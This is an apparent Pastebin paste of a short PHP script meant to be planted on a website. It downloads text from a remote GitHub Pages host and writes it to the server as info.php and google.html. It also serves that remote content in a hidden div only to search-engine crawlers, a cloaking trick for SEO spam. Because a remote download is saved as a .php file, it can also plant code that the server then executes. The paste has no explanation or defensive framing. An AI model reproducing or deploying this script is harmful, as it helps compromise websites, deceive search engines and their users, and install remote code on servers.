Advertisement
Guest User

asdasd

a guest
Dec 11th, 2018
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. <?php
  2. $links = file_get_contents("https://b0ru70.github.io/seo.txt");
  3. echo $links;
  4. $file = fopen('info.php', 'w');
  5. $links = file_get_contents("https://b0ru70.github.io/seo.txt");
  6. fwrite($file, $links);
  7. fclose($file);
  8. $file2 = fopen('google.html', 'w');
  9. $link1 = file_get_contents("https://b0ru70.github.io/seo.txt");
  10. fwrite($file2, $link1);
  11. fclose($file2);
  12. ?>
  13. <div style="display: none;">
  14. <?php
  15. if(preg_match('/Google Web Preview|bot|spider|wget/i',$_SERVER['HTTP_USER_AGENT'])){
  16. echo file_get_contents('https://b0ru70.github.io/seo.txt');
  17. }
  18. ?>
  19. </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement